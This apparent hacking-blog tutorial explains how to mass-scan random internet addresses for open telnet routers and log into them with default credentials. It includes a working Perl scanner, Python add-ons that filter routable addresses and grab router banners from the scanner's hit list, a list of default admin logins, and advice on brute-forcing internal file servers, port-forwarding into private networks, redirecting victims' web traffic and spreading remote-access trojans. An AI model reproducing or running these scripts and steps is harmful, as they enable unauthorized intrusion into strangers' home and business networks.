Thursday

Hack Router For Exploration

 REMOTE ROUTER HACKING

Introduction

This tutorial deals with scanning large numbers of addresses for telnet
services and then trying default credentials against the hosts that
answer, which succeeds surprisingly often.



  • Why Telnet? Isn't That Dead Now?

You're partly correct. Telnet was superseded by SSH because telnet sends
everything, including the login credentials, in plain text, whereas SSH
encrypts the session. But telnet is still very much in use on routers,
for simple administration by the low-tech management systems that ship
with a lot of off-the-shelf routers. Some of these routers accept telnet
connections from the Internet side as well as from the LAN - those are
the boxes we are looking for.



  • So what do I need?

You'll need to run the Perl script below (written by me). It simply
generates a random IP address; if the address is in a scannable range
(i.e. not a private, experimental, multicast or loopback address) the
program attempts to open a TCP connection to the telnet port (23) of
that address, and if the connect succeeds it logs the hit to a local
file for later analysis. The program then repeats, so if you run a few
instances for a few hours you can end up with a list of around 200
telnet servers - I've left mine overnight before and collected 880.





Code:



#!/usr/bin/perl
# Random Telnet Scanner - written by 50LaR15
use strict;
use warnings;
use IO::Socket::INET;

$| = 1;                        # flush output straight away so you can watch it live

my $port    = 23;              # change this number to scan for a different service
my $timeout = 3;               # 1 second usually works, 3 is safer on slow links
my $outfile = 'telnet.txt';    # results go here, in the script's working directory

########################### IP GENERATOR ########################
# True for address space that cannot be reached from the Internet
# (loopback, RFC 1918 private, link-local, carrier NAT), which would
# only waste a probe.
sub unroutable {
    my ($o1, $o2) = @_;
    return 1 if $o1 == 10;                               # 10.0.0.0/8
    return 1 if $o1 == 127;                              # 127.0.0.0/8 loopback
    return 1 if $o1 == 172 && $o2 >= 16 && $o2 <= 31;    # 172.16.0.0/12
    return 1 if $o1 == 192 && $o2 == 168;                # 192.168.0.0/16
    return 1 if $o1 == 169 && $o2 == 254;                # 169.254.0.0/16 link-local
    return 1 if $o1 == 100 && $o2 >= 64 && $o2 <= 127;   # 100.64.0.0/10 carrier NAT
    return 0;
}

# Random address: first octet 1..223 avoids multicast and experimental
# space, the remaining octets 1..254 avoid .0 and .255 host parts.
sub ipgen {
    while (1) {
        my $oct1 = int(rand(223)) + 1;
        my $oct2 = int(rand(254)) + 1;
        my $oct3 = int(rand(254)) + 1;
        my $oct4 = int(rand(254)) + 1;
        next if unroutable($oct1, $oct2);                # draw again for local or private space
        return "$oct1.$oct2.$oct3.$oct4";
    }
}
#################################################################

############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";

while (1) {                                              # keeps running until you kill it
    my $target = ipgen();                                # get a random ip to scan
    print "*??* SCANNING: $target \n";
    my $sock = IO::Socket::INET->new(                    # TCP connect; undef means closed, filtered or timed out
        PeerAddr => $target,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => $timeout,
    );
    next unless $sock;                                   # nothing listening, move on
    print "*!!* SUCCESS-: $target \n";
    open(my $dat, '>>', $outfile) or die "Cannot open $outfile: $!";
    print $dat "SUCCESS: $target \n";                    # append the hit for later analysis
    close($dat);
    close($sock);                                        # only close a socket we actually opened
}
#################################################################
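The range filter is the part of the scanner most worth getting right: a test on the first octet alone either throws away all of 172/8 and 192/8 (when only 172.16/12 and 192.168/16 are actually private) or lets through link-local, carrier-grade NAT and reserved space that will never answer. The Python below is an added example, not the tutorial's own code; it does the same generate-and-filter step with the standard library's ipaddress module, which already knows the IANA special-purpose ranges. The address list in the main block is constructed to show the verdicts.

```python
"""Pick random IPv4 addresses that are actually worth a probe.

Added example in Python, not the tutorial's own code.  It leans on the
standard library's ipaddress module, which already knows the IANA
special-purpose ranges, instead of testing the first octet by hand.
"""
import ipaddress
import random


def is_scannable(addr: str) -> bool:
    """True only for globally routable unicast addresses.

    Rejects loopback (127/8), RFC 1918 space (10/8, 172.16/12,
    192.168/16), link-local (169.254/16), carrier-grade NAT (100.64/10),
    the documentation and benchmark blocks, multicast (224/4) and the
    reserved 240/4 block.  A first-octet test cannot tell 172.5.0.1
    (public) from 172.20.0.1 (private); this can.  Some CPython versions
    report multicast addresses as is_global, hence the explicit check.
    """
    ip = ipaddress.IPv4Address(addr)
    return (
        ip.is_global
        and not ip.is_private
        and not ip.is_loopback
        and not ip.is_link_local
        and not ip.is_multicast
        and not ip.is_reserved
    )


def random_public_ipv4(rng=None) -> str:
    """Draw uniformly from the whole 32-bit space and reject until the
    draw is scannable; rejection sampling keeps the distribution uniform
    over the usable space."""
    rng = rng or random
    while True:
        candidate = str(ipaddress.IPv4Address(rng.getrandbits(32)))
        if is_scannable(candidate):
            return candidate


def sample_addresses(count: int, seed: int = 1) -> list[str]:
    """Reproducible batch of candidates (seeded RNG) for checking the filter."""
    rng = random.Random(seed)
    return [random_public_ipv4(rng) for _ in range(count)]


if __name__ == "__main__":
    # Constructed list of addresses covering the ranges that matter.
    for a in ["8.8.8.8", "10.1.1.1", "172.5.0.1", "172.20.0.1",
              "192.5.0.1", "192.168.1.1", "169.254.1.1", "100.64.0.1",
              "224.0.0.1", "240.0.0.1"]:
        print(f"{a:>15}  {'scan' if is_scannable(a) else 'skip'}")
    print("random:", ", ".join(sample_addresses(5)))
```

Drop random_public_ipv4 into any connect loop in place of a hand-rolled octet generator; the verdicts come from the IANA registry data shipped with Python rather than from whatever octet limits you remembered.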




You'll also need a telnet client. I recommend PuTTY because it supports
proxies, but you are dealing with people who don't know how to change
their router password, so you shouldn't be too worried and can use the
default OS telnet client. Windows XP and Linux users already have one;
Windows 7 users will need to enable it first (Telnet Client is an
optional Windows feature, switched on under "Turn Windows features on or
off").



  • Ok - I'm Set Up - So Now What?

You'll need to start a few instances of the Perl script; you can tile
them across your desktop as in my screenshot if you wish.

You can just run one, but it will take longer to get a decent-sized
list of servers. I run 5 for around half an hour and that gives me a
list of around 50 telnet boxes.




Now you have your list of IPs with the telnet port open (in telnet.txt,
in the same directory as the Perl script). Take your telnet client and
start connecting to them; you will be prompted for a username and
password.

This is where it gets fun, because a large number of routers ship with
default accounts. Here are the most common.



Username : Password
___________________

admin : admin
admin : (blank password)
root  : (blank)
root  : root




To be honest, a lot of routers disclose their model number in the
telnet banner when you connect, so a simple Google search often turns up
the default username and password. Otherwise I try the top three,
usually get disconnected, and move on to the next one in my list.



You will find out quite fast how many IPs in your list you can actually
log into with full admin rights.
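Reading the banner by hand in PuTTY is fine for a dozen hosts, but a raw telnet stream opens with option negotiation bytes (IAC DO/WILL and subnegotiations) that show up as garbage if you just recv() and print. The Python script below is an added example, not part of the original tutorial: it reads the SUCCESS lines from telnet.txt (the format the Perl scanner writes), connects to each host, refuses every option the server offers so it drops into plain NVT mode, and records what the box says up to the login prompt. The sample byte string at the top is constructed for the test and is not a capture from any real device.

```python
"""Read the scanner's hit list and pull a clean banner from each host.

Added example, not the tutorial's own code.  Assumes the scanner's
output is telnet.txt with lines like "SUCCESS: a.b.c.d".
"""
import re
import socket

# Telnet command bytes (RFC 854).
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240

# The usual login/username/password prompts, at the end of the stream.
PROMPT_RE = re.compile(rb"(login|user ?name|password)\s*:\s*$", re.IGNORECASE)

# Constructed sample of what a router sends on connect (not a real capture):
# IAC DO TERMINAL-TYPE, IAC WILL ECHO, a terminal-type subnegotiation,
# then the banner and the login prompt.
SAMPLE_STREAM = (
    b"\xff\xfd\x18"
    b"\xff\xfb\x01"
    b"\xff\xfa\x18\x01\xff\xf0"
    b"Example Router OS v1.0\r\nlogin: "
)


def strip_negotiation(data: bytes) -> tuple[bytes, bytes]:
    """Split a raw telnet stream into (cleartext, replies_to_send).

    Every DO is refused with WONT and every WILL with DONT so the server
    settles into plain NVT mode; SB ... SE subnegotiations are dropped;
    IAC IAC is unescaped to one 0xff byte.  A command cut off at the end
    of the buffer is left for the caller to retry once more data arrives.
    """
    text, replies = bytearray(), bytearray()
    i = 0
    while i < len(data):
        if data[i] != IAC:
            text.append(data[i])
            i += 1
            continue
        if i + 1 >= len(data):
            break                          # lone IAC at the end: wait for more
        cmd = data[i + 1]
        if cmd == IAC:                     # escaped literal 0xff
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= len(data):
                break                      # option byte not here yet
            opt = data[i + 2]
            if cmd == DO:
                replies += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                replies += bytes([IAC, DONT, opt])
            i += 3
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end == -1 else end + 2
        else:                              # NOP, GA, AYT and friends
            i += 2
    return bytes(text), bytes(replies)


def parse_targets(lines) -> list[str]:
    """Extract the dotted-quad from each 'SUCCESS: a.b.c.d' line."""
    hits = []
    for line in lines:
        m = re.search(r"SUCCESS:\s*(\d{1,3}(?:\.\d{1,3}){3})", line)
        if m:
            hits.append(m.group(1))
    return hits


def grab_banner(host: str, port: int = 23, timeout: float = 3.0) -> str:
    """Connect, answer option negotiation, and read until a login prompt
    appears or the socket goes quiet; returns the cleaned banner text."""
    raw, sent = bytearray(), 0
    with socket.create_connection((host, port), timeout=timeout) as s:
        while len(raw) < 4096:             # a banner is small; don't read forever
            try:
                chunk = s.recv(1024)
            except socket.timeout:
                break
            if not chunk:
                break
            raw += chunk
            text, replies = strip_negotiation(bytes(raw))
            if len(replies) > sent:        # only send replies not sent yet
                s.sendall(replies[sent:])
                sent = len(replies)
            if PROMPT_RE.search(text):
                break
    return strip_negotiation(bytes(raw))[0].decode("latin-1", "replace")


if __name__ == "__main__":
    with open("telnet.txt") as fh:
        targets = parse_targets(fh)
    for host in targets:
        try:
            banner = grab_banner(host)
        except OSError as exc:
            banner = f"<error: {exc}>"
        print(f"{host}: {banner.strip()!r}")
```

Run it in the directory that holds telnet.txt; each line of output is a host followed by its cleaned banner, which is usually enough to identify the model before you open a session by hand.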








  • Who Exactly Am I Hacking?

This is half the fun for me - you don't really know. If you're
interested you can do a quick whois, but around 90% of the time you're
dealing with home routers that people have bought from a shop and not
configured properly. I have found businesses and offices that have
succumbed to the same laziness as the home user, though, so the
possibilities are endless.



  • Ok now what?

From here it's up to you what you do, but I enjoy using simple network
tools like ipconfig and ping to map out the network; sometimes I have
found routers with nmap and telnet clients on them. Today I found one
that let me download any C code onto it I wanted. Almost every router OS
is different, so some take a while to get used to in terms of what
commands you can run, but it is a lot of fun finding out people's
network layout. I have compromised routers and made my way into the
internal file servers of the network using brute forcers, or set up port
forwarding on the router to give me external access to otherwise private
internal resources - you can even port forward to printers and use them
across the Internet to print out hundreds of copies of the dictionary or
whatever literature tickles your pickle.




A funny concept that I have got to work in the past is messing with the
routing tables and redirecting every web request to gay porn sites. So I
would imagine this could be useful for people trying to spread RATs,
especially if you find a router with upwards of 100 PCs behind it - but
I don't deal much with RATs and botnets so don't quote me on that.



  • A Small Aside.

I'll be happy if a few people read this tutorial and explore a few
networks, because that's what used to drive hacking forwards and what
used to motivate hackers: the thrill of exploring the unknown, the
chance of coming across a really large network to explore and of
furthering your knowledge and skills with systems. I think people focus
too much on making money from hacking, or on getting their best friend's
fu**book password, and the real fun has somehow been lost in the past 10
years to a new generation of kids that just want everything now. Let's
keep some of the old skills and knowledge alive and not let them be lost
in the archives of long since abandoned forums and IRC rooms.



Thanks For Reading - Happy Hacking
